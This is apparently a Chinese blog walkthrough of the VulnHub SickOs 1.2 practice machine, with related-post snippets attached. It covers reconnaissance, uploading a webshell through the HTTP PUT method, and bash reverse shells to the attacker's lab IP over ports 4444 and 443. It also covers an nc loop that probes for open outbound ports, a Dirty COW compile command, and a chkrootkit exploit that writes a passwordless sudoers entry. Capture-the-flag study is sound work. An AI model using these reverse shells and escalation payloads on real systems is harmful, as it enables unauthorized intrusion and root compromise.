Vulnhub靶机:SickOs1.2

于 2024-03-21 22:23:42 发布
阅读量757 收藏 5
点赞数 11
分类专栏: 靶场 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_48904485/article/details/136922641
版权

一、介绍

运行环境:Virtualbox

攻击机:kali(10.0.2.4)

靶机:SickOs 1.2(10.0.2.15)

目标:获取靶机root权限和flag

靶机下载地址:https://www.vulnhub.com/entry/sickos-12,144/

二、信息收集

使用nmap主机发现靶机ip:10.0.2.15

在这里插入图片描述

使用nmap端口扫描发现靶机开放端口:22、80

nmap -A 10.0.2.15

在这里插入图片描述

22端口:根据nmap扫描结果,22端口安装OpenSSH 5.9p1,该版本存在用户名枚举漏洞

在这里插入图片描述

下载exp,枚举用户名,发现两个用户名:root、john

在这里插入图片描述

使用hydra对john用户爆破ssh,爆破了5个小时,没爆破出来,放弃了

在这里插入图片描述

80端口:打开网站出现一张图片,未发现什么功能点,查看源码也没有发现什么隐藏信息

在这里插入图片描述

使用gobuster工具进行目录爆破,只发现一个/test/目录

gobuster dir -u http://10.0.2.15 -x txt,php,html,bak,sql,xml --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

在这里插入图片描述

访问/test/什么都没有

在这里插入图片描述

使用searchsploit搜索漏洞也没有发现符合lighttpd版本的历史漏洞

在这里插入图片描述

到这里就卡住了,后面看了一下网上的wp,使用nmap脚本进行扫描,查看/test目录支持的方法(又学到一招)

nmap --script http-methods --script-args http-methods.url-path='/test' 10.0.2.15

在这里插入图片描述

三、漏洞利用

利用PUT方法上传一句话木马,201状态码表示请求成功并且服务器创建了新的资源

在这里插入图片描述

使用蚁剑连接一句话木马

在这里插入图片描述

反弹shell,反弹失败,可能是靶机端口做了限制

bash -c 'bash -i >& /dev/tcp/10.0.2.4/4444 0>&1'

在这里插入图片描述

需要找到允许出站的端口

攻击机执行:

//备份iptables规则
iptables-save > /tmp/firewall.rules
//将所有端口的流量都转发到34444端口
iptables -A PREROUTING -t nat -p tcp --dport 1:65535 -j REDIRECT --to-port 34444
//监听34444端口
nc -lvp 34444

sh文件通过蚁剑上传到靶机,并执行

# !/bin/bash
for i in $(seq 1 65535)
do
    timeout 1 nc -vz 10.0.2.4 $i && echo "$i open" >> out.txt || echo "$i closed" >> out.txt;
done
echo "all port done"

在这里插入图片描述

等待攻击机监听出现连接信息

在这里插入图片描述

查看out.txt文件,443端口允许出站

在这里插入图片描述
在这里插入图片描述

攻击机需要先重启一下恢复iptables规则,不然会反弹shell失败

使用443端口反弹shell

bash -c 'bash -i >& /dev/tcp/10.0.2.4/443 0>&1'

在这里插入图片描述

获取交互式shell

python -c 'import pty; pty.spawn("/bin/bash")'

在这里插入图片描述

四、提权

使用命令uname -a查看系统的内核版本,为Linux ubuntu 3.11.0-15-generic

使用cat /etc/*-release命令查看靶机的发行版本为:Ubuntu 12.04.4 LTS

并且靶机存在gcc环境

在这里插入图片描述

使用经典的脏牛漏洞,该漏洞影响 Linux 2.6.22 版本至 4.6 版本的所有 Linux 系统。

将exp下载下来,使用蚁剑上传到靶机

在这里插入图片描述

编译执行,该exp会在/etc/passwd文件写入一个具有root权限的用户:firefart

gcc -pthread CVE-2016-5195.c -o CVE-2016-5195 -lcrypt
./CVE-2016-5195

靶机直接崩溃了

在这里插入图片描述

使用命令find / -perm -u=s -type f 2>/dev/null查看一下具有SUID权限的二进制可执行文件,未发现什么有用的文件

在这里插入图片描述

使用命令ls -l /etc/cron*列出计划任务,发现chkrootkit工具:rootkit后门监测工具

在这里插入图片描述

查看chkrootkit的版本为:0.49

在这里插入图片描述

使用searchsploit查看chkrootkit的历史漏洞,发现本地提权漏洞

在这里插入图片描述

查看利用方法:

将名为“update”且具有非 root 所有者的可执行文件放在 /tmp 中

定期以root权限运行 chkrootkit

文件 /tmp/update 将以 root 身份执行

向update文件中写入将www-date添加到sudo组的命令,并且给/tmp/update添加可执行权限

echo 'echo "www-data  ALL=(ALL)  NOPASSWD:ALL" >> /etc/sudoers' >/tmp/update
chmod +x /tmp/update

在这里插入图片描述

命令执行成功

在这里插入图片描述

切换为root权限

在这里插入图片描述

获取flag

在这里插入图片描述

参考链接:https://blog.csdn.net/weixin_45744814/article/details/120135783

huang0c
关注
  • 11
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
靶机渗透SickOs1.2(非常详细,适合新手渗透)
君莫hacker的博客
09-08 7172
靶机HACKME:2的目录0x01靶机描述 0x01靶机描述 靶机基本信息: 链接 https://www.vulnhub.com/entry/sickos-12,144/ 作者 D4rk 发布日期 2016年4月27日 难度 中等 靶机基本介绍: 这是SickOs后续系列中的第二个,独立于以前的版本,挑战的范围是在系统上获得最高权限。 ...
vulnhub】---SickOS1.2靶机
qq_43168364的博客
08-22 416
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机靶机(192.168.15.) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 命令:nmap -sn 192.168.15.0/24 命令:netdiscover -i eth0 -r 192.168.15.0/24 命令:arp-scan -l 端口扫描 命令:masscan --rate=10000 --ports 0-65535 19
Vulnhub靶机 SickOs1.2
菜浪马废的博客
04-25 230
没啥有用的东西 只有一个test 可以用put方式 试了好几个端口4444 1180 1234都不行 换了443可以了 成功提权 就用了一种方法 这有个大佬,写的超级详细 传送门 ...
靶机渗透实战——SickOs1.2
wlw876747595的博客
12-17 895
一、实验环境 靶机SickOs1.2,IP地址暂时未知 测试机:Kali(IP:192.168.232.130) 测试机:物理机win7 二、实验流程 信息收集——主机发现 信息收集——端口扫描 渗透测试 三、实验步骤 (一)信息收集——主机发现 1、查看kaliIP信息 2、查看靶机页面 3、扫描主机(netdiscover) netdiscover -i e...
SickOs1.2 靶机渗透
weixin_44769042的博客
11-09 3939
靶机记录--9 目录 1.主机发现 2.端口扫描 3.版本信息,操作系统扫描 4.漏洞查找及利用 1> 访问网站 2> 22端口尝试ssh登陆 3> 目录扫描 4>查看该目录支持的方法 1>> nmap探测 2>> burp抓包探测 5> 写入一句话木马 6> 蚁剑连接 7> getshell 1>>将kali自带的反弹shell脚本复制出来 2>> 搞到蚁剑里来 3&gt...
Vulnhub-SickOs:1.2
cr7lyl的博客
09-11 1003
记一次Vulnhub-SickOs1.2渗透过程
Vulnhub靶机系列:SickOs: 1.2
汗的博客
04-20 508
这次的靶机Vulnhub靶机:SickOs: 1.1 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址及相关描述 https://www.vulnhub.com/entry/sickos-12,144/ 靶机设置 利用知识及工具 信息收集并getshell 提权 总结 ...
SICKOS: 1.2
MD@@nr丫卡uer
12-18 370
#1寻找目标 nmap -sS -O 192.168.1.0/24 确定ip 192.168.1.124 #2扫描端口 nmap -sS -O -sV 192.168.1.124 发现开放80端口,从web入手。 #3寻找入口 查看源代码,没东⻄。 扫描一下目录 访问瞅瞅,注意到lighttpd/1.4.28 找找有没有能利用的,没有发现能利用的 使用nikto扫描一下,看到一些信息 nikto -host 192.168.1.124 nmap看一下http中开启的methods方法,有个pu
sickOS1.2靶机(超详细)!
qq_68868384的博客
08-16 319
正常模式是默认的,所以-T3什么也不做。看到这个页面把目录下的文件都显示的出来,那么我们看看能不能上传文件,在页面上是没有上传文件的地方,那么我们看一下这个URL支持的请求有哪几种方法,我们可以看到它容许put请求,那试一下put文件上传漏洞可不可行。用burp进行抓包,然后修改它的数据,先尝试一下,让它输出一个phpinfo的页面出来,发现成功了,那么接下来我们就可以上蚁剑了,将蚁剑的木马写入到目标服务器中。注:dir:使用文件/目录枚举模式,-w:指定字典,-x:扫描文件时的后缀名,-u:url地址,
靶机12:sickos-1.2
最新发布
wj33333的博客
10-31 174
1.arp-scan -l扫描IP2.nmap 扫描端口查看80端口3.没有发现可用信息,dirsearch扫描目录访问5.网站指纹识别经过在网上搜索,也没有发现web服务器的版本漏洞。
vulhub-SickOs: 1.2
战神/calmness的博客
05-24 225
目录 信息收集 文件包含 提权-计划任务-chkrootkit版本0.49漏洞 信息收集 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0) 80/tcp open http lighttpd 1.4.28 MAC Address: 00:0C:29:BA:70:AF (VMware) Service Inf..
vulnhub SickOs: 1.2
箭雨镜屋
01-14 2719
渗透思路: nmap扫描---->dirb扫描---->通过PUT方法上传php反弹shell---->利用chkrootkit漏洞提权
Vulnhub-靶机-SickOs 1.2
qq_43264813的博客
03-05 381
Vulnhub靶机—SickOs 1.2 本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关 文章目录Vulnhub靶机—SickOs 1.2一、信息收集二、漏洞利用三、Flag 一、信息收集 【步骤一】使用nmap确定目标靶机地址: 【命令】nmap -sP 192.168.43.0/24 【步骤二】对目标靶机进行全端口扫描: 【命令】nmap -n -T4 -sV -p- 192.168.43.54 【步骤三】尝试22端口弱口令
靶机渗透(九)SickOs1.2
qq_42180996的博客
05-07 2588
靶机SickOs1.2 一、实验环境 二、实验步骤 (一)信息收集 1.查看测试机的IP信息,判断所处网段 2.主机发现(netdiscover) 3.端口扫描(masscan/nmap) 4.网站指纹信息扫描(whatweb) (二)Web渗透 1.浏览web网页(80端口) 2.远程登录(22端口) 3.目录扫描(dirb) (三)获取shell 1.方法一:P...
靶机实战-SickOs1.2
滕财然的博客
01-27 536
SickOs1.2靶机实战 文章目录SickOs1.2靶机实战1、主机发现2、端口扫描3、端口详细信息扫描4、访问80端口--http服务Getshell方式一Getshell方式二5、提权方式一方式二方法三//这一个方法我没成功,你们可以尝试一下 1、主机发现 arp扫描 目标IP:192.168.232.161 2、端口扫描 目标开放80、22端口 3、端口详细信息扫描 4、访问80端口...
vulnhub靶场-sickos1.2
zzzzzzkeai的博客
12-08 281
vulnhub靶场--sickos1.2靶场
SICKOS 1.2 WALKTHROUGH
weixin_41082546的博客
08-11 386
SickOs:1.2 https://www.vulnhub.com/entry/sickos-12,144/ 首先获取目标ip地址,并探测端口 netdiscover -i eth0 -r 192.168.88.1/24 访问web,并查看源码,没有什么有用的东西 目录发现 dirbhttp://192.168.88.201 nikto -hhtt...
vulnhubSickOs1.2 靶机
Nicky_Zheng的博客
01-29 560
1、 信息收集 1.1、主机发现 使用netdiscover扫描靶机ip kali@kali:~$ sudo netdiscover -i eth1 6 Captured ARP Req/Rep packets, from 3 hosts. Total size: 360 _____________________________________________________________________________ IP At M
vulnhub靶机系列:
09-09
3. SickOS:这个系列提供了一些有趣的靶机,涵盖了各种不同类型的漏洞。 4. HackTheBox:虽然HackTheBox不是Vulnhub上的系列,但它也是一个非常受欢迎的漏洞测试平台,提供了一系列具有挑战性的靶机。 这些靶机...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

huang0c

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值